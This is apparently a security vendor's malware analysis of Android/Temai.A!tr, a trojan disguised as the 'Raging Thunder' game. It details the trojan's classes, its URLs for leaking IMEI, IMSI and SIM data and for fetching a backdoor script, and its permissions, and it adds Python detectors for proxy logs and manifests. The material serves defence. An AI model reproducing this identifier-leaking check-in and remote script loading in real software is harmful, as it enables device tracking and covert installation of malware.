Android/Temai.A!tr
Analysis
Android/Temai.A!tr is a piece of malware targeting Android mobile phones.
The trojan comes disguised as a car racing game called 'Raging Thunder'. In the background, however, it registers the infected phone with a remote website (sending its IMEI, IMSI, SIM card number etc.) and then downloads a password-protected ZIP file.
This file is, in fact, a script file; it opens a backdoor that allows the download and installation of other possibly malicious applications on the victim's phone.
Technical Details
The main application is called Raging Thunder (refer to Fig1) and comes in a package called 'com.polarbit.rthunderliteok'.
Fig1 : Legitimate application icon
The malicious package contains the following important classes :
- com.polarbit.rthunderliteok.rthunderlite : This class is the main activity of the application and is launched every time the application is opened. Apart from loading the legitimate functions of the class, it also calls the class com.simpleg.simpleg.
- com.simpleg.simpleg : It launches the service MyService (described below) and sends out an HTTP request to the URL
http://[CENSORED]iu.net/control.html?imei="+IMEI +"&sim="+SIM No+"&imsi="+IMSI+"&model=" +Build.MODEL+"&release="+Build.VERSION.RELEASE +"&qd="+[channelnumber]+"&gamename=" +[Application Package Name]
where the value [channelnumber] is specified as meta-data for MyService in the package's AndroidManifest.xml file.
- com.simpleg.MyService : This service launches a new thread and calls the MDK class with the parameter "0000000194" (we speculate this is a number specific to each package distributing the trojan).
- superpack.fscriptME.MDK : It sends out an HTTP GET request to
http://[CENSORED]ai.com:5222/kspp/do?imei=" + IMEI + "&wid=0000000194&type=&step=0
As a response, a password-protected ZIP file is received. The class then decrypts this file with a hard-coded password. The received file is, in fact, an FScript file and is executed using the class AdScript.
- superpack.fscriptME.AdScript : This class runs the downloaded script file, which contains the malicious functions that allow the download and installation of further possibly malicious applications on the infected phone.
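The two request shapes above (the check-in that leaks device identifiers to /control.html and the payload fetch from /kspp/do) are distinctive enough to match in web proxy logs by path and query parameter names. The following Python is an added example written for this page, not code from the sample or from Fortinet: it classifies request URLs and extracts the two pivot fields an analyst would want (the gamename/qd pair from the check-in and the wid value from the fetch). Since the page censors both hosts, the sample never keys on hostnames; the hostnames in the constructed log lines are placeholders and the identifier values are fake.

```python
"""Detect the Temai check-in and payload-fetch request shapes in proxy log lines.

Added example for this write-up; the log format (client method url status) and
the hostnames are constructed, the path and parameter names come from the page.
"""
from urllib.parse import urlsplit, parse_qs

# Query-parameter names taken from the two request templates described above.
CHECKIN_PARAMS = {"imei", "sim", "imsi", "model", "release", "qd", "gamename"}
FETCH_PARAMS = {"imei", "wid", "type", "step"}


def classify_request(url):
    """Return ('checkin', details), ('fetch', details) or None for one URL.

    Matching uses only the path and the set of parameter names, because the
    real hosts are censored on the page and hostnames change between campaigns.
    """
    parts = urlsplit(url)
    # keep_blank_values keeps 'type=' (empty value) from the fetch request.
    query = parse_qs(parts.query, keep_blank_values=True)
    names = set(query)
    if parts.path.endswith("/control.html") and CHECKIN_PARAMS <= names:
        # gamename names the trojanised package; qd is the channel number
        # read from MyService's meta-data in the manifest.
        return "checkin", {"gamename": query["gamename"][0], "qd": query["qd"][0]}
    if parts.path.endswith("/kspp/do") and FETCH_PARAMS <= names:
        # wid is the per-package number the page speculates about ("0000000194").
        return "fetch", {"wid": query["wid"][0]}
    return None


def scan_proxy_log(lines):
    """Return one dict per matching line: client, verdict and the pivot fields.

    Device identifiers (imei, imsi, sim) are deliberately not copied into the
    result so the report itself does not re-spread them.
    """
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, url = fields[0], fields[2]
        result = classify_request(url)
        if result is None:
            continue
        verdict, details = result
        hits.append({"client": client, "verdict": verdict, **details})
    return hits


# Constructed sample log. Hostnames are placeholders (the page censors the real
# ones) and all identifier values are fake.
SAMPLE_LOG = [
    "10.0.0.5 GET http://c2-host.invalid/control.html?imei=000000000000000&sim=00000000000000000000"
    "&imsi=000000000000000&model=Generic&release=2.3.3&qd=1001&gamename=com.polarbit.rthunderliteok 200",
    "10.0.0.5 GET http://payload-host.invalid:5222/kspp/do?imei=000000000000000&wid=0000000194&type=&step=0 200",
    "10.0.0.7 GET http://www.example.com/control.html?page=1 200",
    "10.0.0.9 GET http://www.example.com/kspp/do?imei=000000000000000 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

Both benign-looking lines are ignored because a matching path alone is not enough; the full parameter set must be present. On a real log, the same client appearing with a check-in followed by a fetch with a fixed wid is the sequence the analysis describes, and the wid and gamename values let a defender group infections by distribution package.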
Permissions required by the application:
- READ_PHONE_STATE
- WRITE_EXTERNAL_STORAGE
- ACCESS_FINE_LOCATION
- ACCESS_NETWORK_STATE
- com.android.vending.BILLING
- RESTART_PACKAGES
- ACCESS_WIFI_STATE
- ACCESS_NETWORK_STATE
- INTERNET
- READ_PHONE_STATE
- GET_TASKS
- MOUNT_UNMOUNT_FILESYSTEMS
- WRITE_APN_SETTINGS
- CHANGE_NETWORK_STATE
- CHANGE_WIFI_STATE
- WRITE_EXTERNAL_STORAGE
- VIBRATE
- WAKE_LOCK
- INSTALL_SHORTCUT
- INTERNET
- ACCESS_COARSE_LOCATION
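A manifest review is the quickest static check against this kind of trojanised game: a racing game has no reason to read the phone's identity, rewrite APN settings or mount filesystems, and the analysis above also points at the [channelnumber] stored as meta-data on MyService. The following Python is an added example for this page, not code from the sample or from Fortinet: it parses a constructed AndroidManifest.xml carrying exactly the permission list above (duplicates included), reports duplicates and the permissions that are unusual for a game, and pulls the meta-data of every declared service. Which permissions count as unusual is the author's assumption; the meta-data key name "channel" and its value are placeholders, since the page gives only the value's role.

```python
"""Triage an AndroidManifest.xml for the permission and meta-data indicators
described in this write-up. Added example; the manifest below is constructed."""
import xml.etree.ElementTree as ET
from collections import Counter

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Assumption (not from the page): permissions a standalone racing game does not need.
UNUSUAL_FOR_A_GAME = {
    "READ_PHONE_STATE", "WRITE_APN_SETTINGS", "MOUNT_UNMOUNT_FILESYSTEMS",
    "RESTART_PACKAGES", "GET_TASKS", "CHANGE_NETWORK_STATE", "CHANGE_WIFI_STATE",
    "ACCESS_FINE_LOCATION", "ACCESS_COARSE_LOCATION",
}


def short_name(full_name):
    """'android.permission.INTERNET' -> 'INTERNET'."""
    return full_name.rsplit(".", 1)[-1]


def triage_manifest(xml_text):
    """Summarise package name, permission anomalies and per-service meta-data."""
    root = ET.fromstring(xml_text)
    declared = [p.get(ANDROID_NS + "name", "") for p in root.iter("uses-permission")]
    counts = Counter(declared)
    shorts = {short_name(p) for p in declared}
    services = {}
    for svc in root.iter("service"):
        # Meta-data children are where this family stores its channel number.
        meta = {m.get(ANDROID_NS + "name"): m.get(ANDROID_NS + "value")
                for m in svc.iter("meta-data")}
        services[svc.get(ANDROID_NS + "name")] = meta
    return {
        "package": root.get("package"),
        "permission_count": len(declared),
        # Duplicate declarations often mean a second component's manifest
        # fragment was merged in, which is worth a look on its own.
        "duplicates": sorted(p for p, n in counts.items() if n > 1),
        "unusual_for_a_game": sorted(shorts & UNUSUAL_FOR_A_GAME),
        "services": services,
    }


# Constructed manifest reproducing the permission list from the page, in order.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.polarbit.rthunderliteok">
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="com.android.vending.BILLING"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <application>
        <activity android:name="com.polarbit.rthunderliteok.rthunderlite"/>
        <service android:name="com.simpleg.MyService">
            <!-- key name 'channel' and value '1001' are placeholders -->
            <meta-data android:name="channel" android:value="1001"/>
        </service>
    </application>
</manifest>
"""

if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

The real manifest would be pulled from the APK with a tool such as apktool or aapt before running this over it; the point of the script is the combination it surfaces, telephony identity plus network and APN control inside a game, rather than any single permission.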
Recommended Action
FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system. If required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
Product | Availability
---|---
FortiGate | Extreme
FortiClient | Extended
FortiMail | Extended
FortiSandbox | Extended
FortiWeb | Extended
Web Application Firewall | Extended
FortiIsolator | Extended
FortiDeceptor | Extended
FortiEDR |